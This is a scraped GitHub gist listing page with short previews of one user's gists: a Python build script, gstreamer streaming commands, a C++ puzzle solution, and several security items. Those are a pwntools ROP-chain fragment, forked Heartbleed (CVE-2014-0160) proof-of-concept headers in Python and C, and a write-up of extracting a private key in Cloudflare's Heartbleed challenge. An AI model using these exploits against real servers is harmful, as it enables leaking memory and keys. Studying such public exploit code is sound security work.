esrever10 esrever10
esrever10
/ install-python-2.7.11.sh
Last active
October 11, 2016 05:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| sudo apt-get update; | |
| sudo apt-get upgrade; | |
| sudo apt-get install autoconf automake gcc make git; | |
| sudo apt-get install libffi-dev libncurses5-dev openssl patch python-dev python-virtualenv libreadline6-dev libsqlite3-dev libbz2-dev; | |
| sudo apt-get install libsqlite3-dev libbz2-dev libdb5.3-dev tk8.6-dev libncurses5-dev libssl-dev libgdbm-dev; | |
| wget https://launchpad.net/ubuntu/+archive/primary/+files/python2.7_2.7.11.orig.tar.gz; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # linux send h264 rtp stream: | |
| gst-launch-1.0 -v ximagesrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000 | |
| # Macos send h264 rtp stream: | |
| gst-launch-1.0 -v avfvideosrc capture-screen=true ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000 | |
| # receive h264 rtp stream: | |
| gst-launch-1.0 -v udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! autovideosink |
esrever10
/ 495_pwn2.py
Created
April 21, 2016 17:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from struct import pack | |
| context(arch='i386', os='linux', log_level='debug') | |
| p = '' | |
| p += pack('<I', 0x0806ed0a) # pop edx ; ret | |
| p += pack('<I', 0x080ea060) # @ .data | |
| p += pack('<I', 0x080bb406) # pop eax ; ret | |
| p += '/bin' | |
| p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret |
esrever10
/ hb-test.py
Created
April 17, 2014 05:51
— forked from takeshixx/hb-test.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| """ | |
| Author: takeshix <[email protected]> | |
| PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]). | |
| Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP. | |
| """ | |
| import sys,struct,socket | |
| from argparse import ArgumentParser |
esrever10
/ cloudflare_challenge
Created
April 14, 2014 05:54
— forked from epixoip/cloudflare_challenge
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the | |
| 10th to get it (ok, looks like I was the 7th.) But I'm happy that I was able to prove to myself | |
| that I too could do it. | |
| First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially | |
| believed that it would be highly improbable under normal conditions to obtain the private key | |
| through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's | |
| challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to | |
| extract private keys. So I wanted to see first-hand if it was possible or not. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * CVE-2014-0160 heartbleed OpenSSL information leak exploit | |
| * ========================================================= | |
| * This exploit uses OpenSSL to create an encrypted connection | |
| * and trigger the heartbleed leak. The leaked information is | |
| * returned encrypted and is then decrypted, decompressed and | |
| * wrote to a file to annoy IDS/forensics. | |
| * | |
| * https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c | |
| * https://raw.githubusercontent.com/decal/ssltest-stls/master/ssltest-stls.py |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
| # Modified by Derek Callaway ([email protected]) to add STARTTLS protocols | |
| # The authors disclaim copyright to this source code. | |
| import sys | |
| import struct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * CVE-2014-0160 heartbleed OpenSSL information leak exploit | |
| * ========================================================= | |
| * This exploit uses OpenSSL to create an encrypted connection | |
| * and trigger the heartbleed leak. The leaked information is | |
| * returned encrypted and is then decrypted, decompressed and | |
| * wrote to a file to annoy IDS/forensics. The exploit can set | |
| * the heatbeart payload length arbitrarily or use two preset | |
| * values for 0x00 and MAX length. The vulnerability occurs due | |
| * to bounds checking not being performed on a heap value which |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
| # The author disclaims copyright to this source code. | |
| import sys | |
| import struct | |
| import socket | |
| import time | |
| import select |
esrever10
/ The broken pedometer.cpp
Last active
December 29, 2015 13:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <cstdio> | |
| #include <vector> | |
| #include <bitset> | |
| #include <climits> | |
| #include <iostream> | |
| using namespace std; | |
| #define MAX 15 | |
| vector<bitset<MAX> > vec; |
NewerOlder